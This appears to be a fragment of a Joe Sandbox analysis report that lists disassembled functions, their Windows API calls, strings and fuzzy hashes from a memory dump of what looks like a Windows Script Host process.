GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B93385
DispatchMessageA.USER32 ref: 00007FF7C0B93477
GetMessageA.USER32 ref: 00007FF7C0B93489

Strings

Remote, xrefs: 00007FF7C0B932FE
Software\Microsoft\Windows Script Host\Settings, xrefs: 00007FF7C0B932B5, 00007FF7C0B932CC
Enabled, xrefs: 00007FF7C0B932DC

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseMessage$CurrentDispatchThread
String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
API String ID: 161541553-3078226056
Opcode ID: 5cf0ade7f280740e5f0efe1e6f24d2458c7bbc4dcc6469048af84908b933bf4f
Instruction ID: 2e31ccf681b37b832cb135f652c889f945b14d70d9c318a8f52cdcd58282b827
Opcode Fuzzy Hash: 5cf0ade7f280740e5f0efe1e6f24d2458c7bbc4dcc6469048af84908b933bf4f
Instruction Fuzzy Hash: 36617122B09A4295EB11EF25DC406A9A3B0FF44BA8F944135DE4E87BA4DF3CF515C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B97F40, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7C0B97F99
memset.MSVCRT ref: 00007FF7C0B97FE5
GetProcAddress.KERNEL32 ref: 00007FF7C0B98058
GetLastError.KERNEL32 ref: 00007FF7C0B98063
GetLastError.KERNEL32 ref: 00007FF7C0B980A6
FreeLibrary.KERNEL32 ref: 00007FF7C0B980C8

Strings

WinVerifyTrust, xrefs: 00007FF7C0B9804E
wintrust.dll, xrefs: 00007FF7C0B98037

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ErrorLastmemset$AddressFreeLibraryProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 2451772358-2991032369
Opcode ID: 269f55e51722e6f0d9cdf45d9cd32dbfa92726a59ea72221d2bff7cffb17ffe0
Instruction ID: 2071f8721701882bcdecd0807ad0a91d58b78568b39439bc8d75fd849347758f
Opcode Fuzzy Hash: 269f55e51722e6f0d9cdf45d9cd32dbfa92726a59ea72221d2bff7cffb17ffe0
Instruction Fuzzy Hash: F1517E72B08B428AF711EF75D8403ADA3A1BB48768F804135DE0AD6B48DF7CE519C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9CDC0, Relevance: 13.8, APIs: 9, Instructions: 265memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B9CEA8
VariantClear.OLEAUT32 ref: 00007FF7C0B9D104
SysFreeString.OLEAUT32 ref: 00007FF7C0B9D137
SysFreeString.OLEAUT32 ref: 00007FF7C0B9D149

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$Free$AllocClearVariant
String ID:
API String ID: 2934074361-0
Opcode ID: 621877a8cd31627654a6532bc4368b19cc2a0c9914f9bc73eb7a744b8d95f29f
Instruction ID: d25e480b3b1af4f9e8abb3afab12f337b985b482f7f803234224002db0db697a
Opcode Fuzzy Hash: 621877a8cd31627654a6532bc4368b19cc2a0c9914f9bc73eb7a744b8d95f29f
Instruction Fuzzy Hash: 5EC17136B08A4286EB10EF65D8501ACB371FB88BA8B904135DE1E97794DF39F559C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B92838, Relevance: 13.6, APIs: 9, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00007FF7C0B9286C
SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B92877
SysStringLen.OLEAUT32 ref: 00007FF7C0B9288A
SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B92897
SysStringLen.OLEAUT32 ref: 00007FF7C0B928AA
SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B928B7

Part of subcall function 00007FF7C0B91078: RtlLeaveCriticalSection.NTDLL ref: 00007FF7C0B91087

SysFreeString.OLEAUT32 ref: 00007FF7C0B928FB
SysFreeString.OLEAUT32 ref: 00007FF7C0B92904
SysFreeString.OLEAUT32 ref: 00007FF7C0B9290D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$AllocFree$CriticalLeaveSection
String ID:
API String ID: 2754475248-0
Opcode ID: 5f9a81f22091c35c80351703c43142c8756230b5411ad9b6aeec3762bd592d2e
Instruction ID: ec47b6ac0534df44f4593c28792b369181379a9edd325d15faf14a3a2f878ab1
Opcode Fuzzy Hash: 5f9a81f22091c35c80351703c43142c8756230b5411ad9b6aeec3762bd592d2e
Instruction Fuzzy Hash: 6F312F36E15B5696DA05EF16A940029B3A4FB88FA0B940435DF4E87B54EF3CF462C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9F908, Relevance: 13.6, APIs: 9, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007FF7C0B9F92A
memset.MSVCRT ref: 00007FF7C0B9F947
SysStringLen.OLEAUT32 ref: 00007FF7C0B9F955
SysAllocString.OLEAUT32 ref: 00007FF7C0B9F962
SysStringLen.OLEAUT32 ref: 00007FF7C0B9F974
SysAllocString.OLEAUT32 ref: 00007FF7C0B9F981
SysFreeString.OLEAUT32 ref: 00007FF7C0B9F999
SysFreeString.OLEAUT32 ref: 00007FF7C0B9F9A8
??3@YAXPEAX@Z.MSVCRT ref: 00007FF7C0B9F9B1

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$AllocFree$??3@_malloc_dbgmemset
String ID:
API String ID: 612691619-0
Opcode ID: 457bcfb5f54c50030ed694868103fc0455fb9366be79bb5f7e913c49e0c9a23f
Instruction ID: cab102ed32384e0fcefcdd13950f4f7f0b79e10cc641628a254b5cfb3654c61c
Opcode Fuzzy Hash: 457bcfb5f54c50030ed694868103fc0455fb9366be79bb5f7e913c49e0c9a23f
Instruction Fuzzy Hash: 4C214121A09B5296EB55EF22A84023CA3B0EF44FB4F840434DA4F83745EF3CF45287A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9F838, Relevance: 13.6, APIs: 9, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007FF7C0B9F85A
memset.MSVCRT ref: 00007FF7C0B9F877
SysStringLen.OLEAUT32 ref: 00007FF7C0B9F882
SysAllocString.OLEAUT32 ref: 00007FF7C0B9F88F
SysStringLen.OLEAUT32 ref: 00007FF7C0B9F8A1
SysAllocString.OLEAUT32 ref: 00007FF7C0B9F8AE
SysFreeString.OLEAUT32 ref: 00007FF7C0B9F8C6
SysFreeString.OLEAUT32 ref: 00007FF7C0B9F8D5
??3@YAXPEAX@Z.MSVCRT ref: 00007FF7C0B9F8DE

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$AllocFree$??3@_malloc_dbgmemset
String ID:
API String ID: 612691619-0
Opcode ID: bdff5e16ec6d953d08013135ee1635a96b1522a39afa9bc39ee011d4bc740ed8
Instruction ID: 09a30c31b3cbc4bffa568580bf1bbf6003b9e596577330e77470a596bed6c9ac
Opcode Fuzzy Hash: bdff5e16ec6d953d08013135ee1635a96b1522a39afa9bc39ee011d4bc740ed8
Instruction Fuzzy Hash: 81211021E09B5296EB55EF26A89013DA3B0EF44FB0F944434D90F86B45DF3CF45186A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9A150, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 265memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B9A320
SysFreeString.OLEAUT32 ref: 00007FF7C0B9A4D7
SysFreeString.OLEAUT32 ref: 00007FF7C0B9A4E1
SysFreeString.OLEAUT32 ref: 00007FF7C0B9A4EB
SysFreeString.OLEAUT32 ref: 00007FF7C0B9A4F5
SysFreeString.OLEAUT32 ref: 00007FF7C0B9A4FF

Strings

WScript_OnScriptTerminate, xrefs: 00007FF7C0B9A435

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$Free$Alloc
String ID: WScript_OnScriptTerminate
API String ID: 986138563-526745235
Opcode ID: d1c6a9427b429854884164cfe1c7cdabe57998c50c27a6d10440de56b74aad2b
Instruction ID: efad1d900fd8028813f80f4648453a4d1f45ac2889a402b9317027419cb07f49
Opcode Fuzzy Hash: d1c6a9427b429854884164cfe1c7cdabe57998c50c27a6d10440de56b74aad2b
Instruction Fuzzy Hash: 0BC16276B08B4586EB11EF66D8801ADB771FB48BA8B504036CE0E97B64DF78F459C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9FA5C, Relevance: 12.2, APIs: 8, Instructions: 205memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

SafeArrayCreate.OLEAUT32 ref: 00007FF7C0B9FB55
SafeArrayCreate.OLEAUT32 ref: 00007FF7C0B9FB78
SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B9FC17
SafeArrayPutElement.OLEAUT32 ref: 00007FF7C0B9FC36
VariantClear.OLEAUT32 ref: 00007FF7C0B9FC42
SysAllocString.OLEAUT32 ref: 00007FF7C0B9FC8D
SafeArrayPutElement.OLEAUT32 ref: 00007FF7C0B9FCC0
VariantClear.OLEAUT32 ref: 00007FF7C0B9FCCC

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ArraySafe$AllocClearCreateElementStringVariant$_malloc_dbg
String ID:
API String ID: 1334244730-0
Opcode ID: 447acff4cbaa45d1c87a1a9c741093bf58d3103773243910f389adb2559fd00c
Instruction ID: 9989c3f11a244c1ce7bbb2cd8004acfb6dafb33e67c51c8c6e2191db736d64d0
Opcode Fuzzy Hash: 447acff4cbaa45d1c87a1a9c741093bf58d3103773243910f389adb2559fd00c
Instruction Fuzzy Hash: EC818D32A1476296EB15EF55D8401ADA7B4FB08BB4F944435CE0E93B50EF38F965C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B95334, Relevance: 12.2, APIs: 8, Instructions: 151windowCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7C0B95397
PostMessageA.USER32 ref: 00007FF7C0B953B7
CloseHandle.KERNEL32 ref: 00007FF7C0B953CF
SysFreeString.OLEAUT32 ref: 00007FF7C0B954FF
SysFreeString.OLEAUT32 ref: 00007FF7C0B95518
CoRegisterMessageFilter.OLE32 ref: 00007FF7C0B95540
CoRegisterMessageFilter.OLE32 ref: 00007FF7C0B95551
FreeLibrary.KERNEL32 ref: 00007FF7C0B9559A

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeMessage$CloseFilterHandleRegisterString$LibraryPost
String ID:
API String ID: 2505060138-0
Opcode ID: cfb5e8e42cfbdb510ee04b7ec1e11e4ab66f9a186bda1c6afec1fb275568dd6c
Instruction ID: b5850d75fc08f740a4fde3c3c0042a2b20297882d610b57781e7c011be811e46
Opcode Fuzzy Hash: cfb5e8e42cfbdb510ee04b7ec1e11e4ab66f9a186bda1c6afec1fb275568dd6c
Instruction Fuzzy Hash: 88712826719B9582EE49EF25D994268A364FF84FA0F484536CA1F83B60CF38F465C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B92C92, Relevance: 12.1, APIs: 8, Instructions: 135memorywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA09CC: LoadStringW.USER32 ref: 00007FF7C0BA0A16
Part of subcall function 00007FF7C0BA09CC: SysAllocString.OLEAUT32 ref: 00007FF7C0BA0A63

SysStringLen.OLEAUT32 ref: 00007FF7C0B92D29
GetActiveWindow.USER32 ref: 00007FF7C0B92DDA
MessageBoxW.USER32 ref: 00007FF7C0B92DF4
SysFreeString.OLEAUT32 ref: 00007FF7C0B92E04
SysFreeString.OLEAUT32 ref: 00007FF7C0B92E0D
SysFreeString.OLEAUT32 ref: 00007FF7C0B92E16
GetProcessHeap.KERNEL32 ref: 00007FF7C0B92E21
HeapFree.KERNEL32 ref: 00007FF7C0B92E2F

Part of subcall function 00007FF7C0B96954: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969BB
Part of subcall function 00007FF7C0B96954: GetLastError.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B969C9
Part of subcall function 00007FF7C0B96954: LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B27
Part of subcall function 00007FF7C0B96954: LocalFree.KERNEL32(?,?,?,?,?,?,?,WSHRemote.Execute,?,?,?,00007FF7C0B96597), ref: 00007FF7C0B96B36

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeString$HeapLocalMessage$ActiveAllocErrorFormatLastLoadProcessWindow
String ID:
API String ID: 1277942935-0
Opcode ID: fffda8997a2d5a8440ecd5c016cff23b5f10bebc83455b02508e63b3bebb8427
Instruction ID: fbb251b40d5f1e5188aa8879f58add6ed69ba0923eff1ef018962c34f44126a0
Opcode Fuzzy Hash: fffda8997a2d5a8440ecd5c016cff23b5f10bebc83455b02508e63b3bebb8427
Instruction Fuzzy Hash: 4F417062F18A1295FB11EF61DD401BDA771BF44BA4F844035DE0E97B58EF38A45683A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B98880, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF7C0B98ABB
SysFreeString.OLEAUT32 ref: 00007FF7C0B98AC5
SysFreeString.OLEAUT32 ref: 00007FF7C0B98ACF
SysFreeString.OLEAUT32 ref: 00007FF7C0B98AD9
SysFreeString.OLEAUT32 ref: 00007FF7C0B98AE3

Strings

WScript_OnScriptTerminate, xrefs: 00007FF7C0B98A04

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeString
String ID: WScript_OnScriptTerminate
API String ID: 3341692771-526745235
Opcode ID: 7b5772277f4ba1f20c59476304da94783dd31d316957cf6344288223532e7827
Instruction ID: a0ab7da16af3eeeadd9a9c001e0ec02bb190c52d1c4ab171f67f6c7c3d56d7ed
Opcode Fuzzy Hash: 7b5772277f4ba1f20c59476304da94783dd31d316957cf6344288223532e7827
Instruction Fuzzy Hash: 77814E32B08B5686E711DF65D8801ADB3B0FB48BA8F500536DE4E93B68DF78E455C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B97E44, Relevance: 10.6, APIs: 7, Instructions: 75COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32 ref: 00007FF7C0B97E67
GetLastError.KERNEL32 ref: 00007FF7C0B97E73

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: DirectoryErrorLastSystem
String ID:
API String ID: 3081803543-0
Opcode ID: 7a6bc62256a5c0d23d4b35ba05489be1f19e2a1138f4017b1588562ef060e3a7
Instruction ID: 104b6cf59d5d6d247da78f9235990ef828adaabda74c9e229acc3e20c312c2d4
Opcode Fuzzy Hash: 7a6bc62256a5c0d23d4b35ba05489be1f19e2a1138f4017b1588562ef060e3a7
Instruction Fuzzy Hash: 3C217521B08A4246E701EF65AC40379A6E5AF84BB0F944635CA4FC67D4EF3CB95682A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B95934, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7C0B9596E
RegOpenKeyExA.ADVAPI32 ref: 00007FF7C0B9599F
RegCloseKey.ADVAPI32 ref: 00007FF7C0B959B0
RegCloseKey.ADVAPI32 ref: 00007FF7C0B95A02

Strings

ScriptEngine, xrefs: 00007FF7C0B95998
Shell, xrefs: 00007FF7C0B959D5

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseOpen
String ID: ScriptEngine$Shell
API String ID: 47109696-1851718235
Opcode ID: 09cbf8bc278e6ce95fe13d24c3d7e1b7f77f273cb609e67cf790a2f640d49d34
Instruction ID: 83d4d02bb42e05919e51f4ee85e1ee1cb5ac0b20b04e8d3e5ce08b445cf7bbe1
Opcode Fuzzy Hash: 09cbf8bc278e6ce95fe13d24c3d7e1b7f77f273cb609e67cf790a2f640d49d34
Instruction Fuzzy Hash: 8D219331B58B5285F700EF66ED4062AA2A1EB84BE0F904131EE5EC7B54DF2CF841C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9E254, Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32 ref: 00007FF7C0B9E2A1
SysFreeString.OLEAUT32 ref: 00007FF7C0B9E2DA
SysFreeString.OLEAUT32 ref: 00007FF7C0B9E2E7
SysFreeString.OLEAUT32 ref: 00007FF7C0B9E2F1
SysFreeString.OLEAUT32 ref: 00007FF7C0B9E315
SysFreeString.OLEAUT32 ref: 00007FF7C0B9E324
??3@YAXPEAX@Z.MSVCRT ref: 00007FF7C0B9E32D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeString$??3@ArrayDestroySafe
String ID:
API String ID: 3740040915-0
Opcode ID: 16f3eab80ef4dacb5231b29a6cc046dfb4d9c14c12fe641159d648035459e9b3
Instruction ID: 095bbdd11a1c372cd5ec41366149b7ea899e27c5da338ade046e676211beceb3
Opcode Fuzzy Hash: 16f3eab80ef4dacb5231b29a6cc046dfb4d9c14c12fe641159d648035459e9b3
Instruction Fuzzy Hash: 1B312A36A09B0185EA06EF15E990278B374FF44FA0B944435DA5F83B64DF2CF4A5C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA3180, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF7C0BA31D7
RegQueryValueExW.ADVAPI32 ref: 00007FF7C0BA320B
RegCloseKey.ADVAPI32 ref: 00007FF7C0BA3218
_wcsnicmp.MSVCRT ref: 00007FF7C0BA323C

Strings

Locale, xrefs: 00007FF7C0BA31F4
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00007FF7C0BA31C9

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseOpenQueryValue_wcsnicmp
String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
API String ID: 2262609651-1161606707
Opcode ID: 541c0b2b4d560e94bb94dfee6909b568592f080552c435190cef48e6c380e065
Instruction ID: af62b97c33feb923b07b982d4eb6c20d452494045e6d8d65b3028a4ac7a99ce5
Opcode Fuzzy Hash: 541c0b2b4d560e94bb94dfee6909b568592f080552c435190cef48e6c380e065
Instruction Fuzzy Hash: BE318F31A18B0281EB11EF55E84466AB3A5FF48BA0FD04135EA9E83B54DF3CF565C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B96B8C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BD0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BE9
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96C09
CreateFileMoniker.OLE32 ref: 00007FF7C0B96C3F

Strings

CreateURLMonikerEx, xrefs: 00007FF7C0B96BFF
urlmon.dll, xrefs: 00007FF7C0B96BC3

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: AddressCreateErrorFileLastLibraryLoadMonikerProc
String ID: CreateURLMonikerEx$urlmon.dll
API String ID: 618665799-3151727589
Opcode ID: 2c6acf82c92bc204260e3ef2635251f6082680815dbc070a751a038f35cb3923
Instruction ID: c5422cea6a239ae0e3ff4c514af863c148f76e920937fdb5d449caa4490b9604
Opcode Fuzzy Hash: 2c6acf82c92bc204260e3ef2635251f6082680815dbc070a751a038f35cb3923
Instruction Fuzzy Hash: A6110A24B0D75381FB46EF55AC54275A2A4EF08BA4F944039C84FC67A0EF2DB86582B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9FF54, Relevance: 9.1, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7C0B9FF74
SafeArrayGetElement.OLEAUT32 ref: 00007FF7C0B9FFB0
SysStringLen.OLEAUT32 ref: 00007FF7C0B9FFC3
